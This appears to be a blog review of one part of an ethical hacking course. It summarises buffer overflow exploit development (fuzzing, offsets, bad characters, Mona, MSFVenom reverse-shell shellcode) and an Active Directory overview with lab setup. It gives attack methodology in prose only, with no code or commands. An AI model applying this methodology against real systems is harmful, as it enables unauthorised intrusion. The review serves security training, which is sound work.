Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 5
In Part 4 I covered Practical Ethical Hacking — The Complete Course: Scanning and Enumeration and Exploitation Basics sections. In that review we walked through several ways to enumerate and scan for different vulnerabilities on a target computer. We’ve covered several tools that allowed us to identify potentially vulnerable services and ports, as well as previously created exploits for them. From content discovery and page enumeration on web applications to vulnerable SMB and Samba clients, we walked through different exploits and identified the difference between staged and non-staged exploits. Finally we touched on credential stuffing SSH services with breach credentials and the half-way mark capstone project.
Let’s dive into the Practical Ethical Hacking — The Complete Course: Introduction to Exploit Development (Buffer Overflow) and Active Directory Overview
The Exploit Development modules starts by running through required installation material that will be useful when practicing the material for this module, Immunity Debugger and VulnServer. Heath then moves on to explain Buffer Overflow and breaks down the anatomy of member: from Kernel, Stack, and Heap to the Data and Text components. To fully understand how Buffer Overflow vulnerabilities occur, and how they can be exploited, Heath ensures an explanation of the Extended Stack Pointer, Buffer Space, Extended Base Pointer, and Extended Instruction Pointer / Return Address registers are given before demonstrating how characters can be used to overflow the stack and result in an exploit. From the overview Heath moves on to covering Spiking, how to find vulnerable functions by throwing characters in an attempt to overflow the program’s function buffers. Similar to Spiking, once you’ve found the vulnerable function, we can switch to a Fuzzing attack method. Fuzzing works similar to spiking, however it targets a single function and throws an increasingly large string of text in an attempt to overflow the function buffer.
Now that we’ve found a vulnerable function and have been able to manually overflow the buffer, Heath teaches us how to identify the offset point where information becomes overwritten and eventually alter where the return address points following the overflow using specific bytes. After using Metasploit to identify the return address, Heath demonstrates how to use this offset value to craft a shellcode payload that reaches the pointer and then appends the chosen values into the EIP which can be used to gain root access to the server via Bad Characters.
Bad Characters are hex characters that cause issues when used in shellcode (a great resource can be found here) and can be used to identify commands within the program that prevent certain hex characters from being used. These characters can be identifies using a hex dump after submitting the characters via inclusion in the shellcode payload.
Before you can execute a buffer overflow attack, you first need to find a DLL or other function within a program that has no memory protections, and to do this you can utilize the tool Mona Modules that can be used in conjunction with Immunity Debugger. Mona can be a great way to automate the detection of vulnerable DLLs or functions, locate return pointers and jump points, as well as reduce the time needed to generate shellcode exploits.
Now that we’re able to identify vulnerable functions, have located return points, and know how to write shellcode to exploit them, we can start to learn how these are used to gain administrative or “root” privileges. In the course, Heath explains how we can use MSFVenom to generate shellcode containing a reverse shell, how to add No Operation (NOPS) padding / jump sled between the overflow to help ensure the shellcode is executed.
Now that we’ve covered how to utilize buffer overflows we move onto what Heath describes as “the most overlooked part of current courses” and “one of the most important items to learn when it comes to ethical hacking” that is a common topic discussed during job interviews. Before configuring a home lab and starting to attack it, we must first know what Active Directory is. Heath does an amazing job covering the fundamentals of what comprises Active Directory (AD). From starting as a directory services created by Microsoft to manage domain networks that functions much like a phone book for Windows, to using Kerberos tickets for authentication, AD is the most commonly used identity management service in the world. While patchable vulnerabilities do exists, most of the AD exploitation occurs through the abuse of features, trusts, and more.
From this basic overview of Active Directory, the course starts to move into active attacks and includes a module dedicated to the building of a target lab environment. This module includes downloading the necessary ISO files, how to set up the domain controllers and user machines, how to properly configure users, groups, and policies, as well as how to join machines to the domain controller and a cloud alternative for those who might like to build the lab in Azure if they do not have the resources available to build the home lab.